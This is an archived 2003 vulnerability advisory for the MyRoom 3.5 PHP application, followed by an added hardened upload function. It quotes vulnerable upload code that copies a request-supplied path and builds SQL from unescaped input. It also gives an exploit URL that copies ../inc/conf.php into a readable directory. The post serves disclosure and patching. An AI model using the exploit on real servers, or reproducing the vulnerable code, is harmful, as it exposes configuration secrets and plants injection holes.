MyRoom (PHP)

From: Frog Man (leseulfrogat_private)
Date: Sat Jan 18 2003 - 16:42:39 PST


    Information :
    °°°°°°°°°°°°°°
    Website : http://www.plansbiz.net
    Version : 3.5 GOLD
    Problems : File copy/upload
    
    
    PHP Code/Location :
    °°°°°°°°°°°°°°°°°°°
    room/save_item.php :
    ------------------------------------------------------------------------
    if($name == "" OR $ref == ""){
    echo "You are fogot enter your 'ITEM NAME' or 'ITEM REF NO' !";
    echo "<br>";
    echo "<a href='$main_file?show=additem'>Try Agains [ Click Here ]</a>";
    exit;
    }
    
    if($photo!="none" AND $photo!="application/octet-stream"){
    
    	//get type of file
    	$filetype=$photo_type;
    
    	//get lenght of image type
    	$filelenght=strlen($filetype);
    
    	//get part of file image to build image extension
    	$pos=strpos($filetype,"/")+1;
    
    	//build extension of image
    	$fileextention=substr($filetype,$pos,$filelenght);
    
    	if($fileextention=="pjpeg"){
    	$fileextention="jpg";
    	}
    
    
    	$image=date("YmdHis");
    	$image.=".".$fileextention;
    	$imgpath = "$imgroot";
    
    	//if image exist, upload it in correct dir
    	if($photov<>"none") {
    	  if(!copy($photo,"$imgpath/$image")) {
    		//display errors
    		$msg="<br><font color='text00'>File Not Uploaded, it might be too large or 
    does not exist..<br>Please Try Again!</font>";
    		break;
    	  }
    	//or finish
    	  else {
    	  	dbconnect();
    	  	$sql= "INSERT INTO room_item SET it_photo='$image', it_name='$name', 
    it_decs='$decs', it_ab='$album', it_ref='$ref'";
    		mysql_query($sql) or die(mysql_error());
    		echo "<meta http-equiv='refresh' content='0;URL= 
    $main_file?show=additem&m=1&i=$name'>";
    	       	echo "<br>Your File Was Uploaded Sucessful!! <br><br><a 
    href='$main_file?show=additem&m=1&i=$name'>Loading ......</a>";
    	  }
    	}
    
    ------------------------------------------------------------------------
    
    
    Exploits :
    °°°°°°°°°°
    http://[target]/room/save_item.php?name=[NAME]&ref=hacked&photo=../inc/conf.php&photo_type=ttxt
    
    + http://[target]/room/index.php?show=search&search=it_name&item=[NAME]
    to find the URL of the txt file which contains the copy of conf.php.
    
    Patch :
    °°°°°°°
    A patch can be found on http://www.phpsecure.info (English version 
    available).
    
    
    More Details :
    °°°°°°°°°°°°°°
    In French :
    http://www.frog-man.org/tutos/MyRoom.txt
    
    Translated by Google :
    http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FMyRoom.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools
    
    
    
    
    frog-m@n
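
A hardened form of the upload step in room/save_item.php, as an added example that is not part of the original post, of MyRoom, or of the phpsecure.info patch. It assumes the form field is named "photo", PHP 7 or later with the fileinfo extension, and the script's existing $imgroot directory; the function name store_item_photo is hypothetical.

```php
<?php
// Added example (not MyRoom code): hardened handling of the "photo" upload.
// Assumptions: form field "photo", PHP >= 7 with fileinfo, $imgroot as in
// the original script. store_item_photo() is a hypothetical helper name.

/**
 * Store an uploaded image under $imgroot and return the generated file name.
 * Throws RuntimeException when the request carries no valid image upload.
 */
function store_item_photo(array $files, string $imgroot): string
{
    // Read the upload only from $_FILES, never from request variables that
    // register_globals lets a query string define ($photo, $photo_type).
    if (!isset($files['photo']) || !is_array($files['photo'])
        || ($files['photo']['error'] ?? null) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('No file uploaded');
    }
    $tmp = $files['photo']['tmp_name'];

    // Reject any path PHP did not itself create for this POST upload,
    // such as a server-side path passed in as a plain parameter.
    if (!is_uploaded_file($tmp)) {
        throw new RuntimeException('Not an uploaded file');
    }

    // Derive the extension from the file content through an allow-list,
    // not from the client-supplied MIME type string.
    $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
    if (!is_string($mime) || !isset($allowed[$mime])) {
        throw new RuntimeException('Unsupported image type');
    }

    // Unpredictable name; the extension comes only from the allow-list.
    $image = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];

    // move_uploaded_file() repeats the upload check before moving the file.
    if (!move_uploaded_file($tmp, rtrim($imgroot, '/') . '/' . $image)) {
        throw new RuntimeException('Could not store file');
    }
    return $image;
}

// Usage inside save_item.php:
// $image = store_item_photo($_FILES, $imgroot);
```

With this in place a request that only sets photo and photo_type in the query string fails at the first check, because nothing appears in $_FILES.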
    
    
    
    
    



    This archive was generated by hypermail 2b30 : Wed Jan 22 2003 - 00:45:37 PST